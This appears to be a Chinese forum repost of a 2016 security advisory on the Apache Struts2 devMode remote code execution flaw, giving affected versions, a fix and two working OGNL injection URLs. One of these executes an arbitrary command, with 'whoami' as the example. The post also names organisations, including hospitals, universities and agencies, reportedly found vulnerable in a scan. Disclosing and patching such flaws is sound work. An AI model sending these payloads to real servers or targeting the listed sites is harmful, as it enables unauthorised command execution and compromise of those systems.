Struts2—devMode远程代码执行漏洞

匿名者  3095天前

2016年6月,启明星辰ADLab已将此漏洞提交至Struts2官方,昨日启明星辰将其公开。

evMode是为了便于开发人员调试程序,Struts2提供了一个devMode模式,可以方便查看程序错误以及日志等信息。

当Struts2中的devMode模式设置为true时,存在严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。

昨日对 158883 使用Struts2的网站进行扫描发现存在该漏洞有54个网站存在该漏洞,根据truts2官方描述,默认配置下devMode是关闭的。

但是在我们在扫描中发现一些重要的网站线上开启devMode模式并受该漏洞的影响。

中国科学院某系统

黑龙江林业厅某站

上海通用汽车某系统

湖南博物馆某处

西宁市第一人民医院某处

上海师范大学某系统

中国天翼某系统

宁夏工业学校某站

华南农业大学某处

湖南宁远公共资源交易中心某处

云南省工程检测协会某处

青铜峡职教中心某处

全国合理用药监测网某处

宁夏交通学校某处

北京智鼎在线某系统

吉林医学院某系统

受影响版本:Struts 2.1.0--2.5.1

漏洞验证POC:

?debug=command&expression=(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter())!%3D(%23wr.println(%23parameters.content%5B0%5D))!%3D(%23wr.flush())!%3D(%23wr.close())&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7f604dbaced33b7d9c2d5e1212eba16e

在开启devMode模式中可输出 “7f604dbaced33b7d9c2d5e1212eba16e” 这段MD5值。

Clipboard Image.png

命令执行回显POC: 

?debug=browser&object=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=whoami

Clipboard Image.png

修复方式:将devMode设置为在struts.properties中的devMode设置为false,或是在struts.xml中添加如下代码:<constant name="struts.devMode" value="false" />。

最新评论

用户名已经被注册  :  wnvCpgrV
3076天前 回复
用户名已经被注册  :  wnvCpgrV
3075天前 回复
用户名已经被注册  :  wnvCpgrV
3073天前 回复
昵称
邮箱
提交评论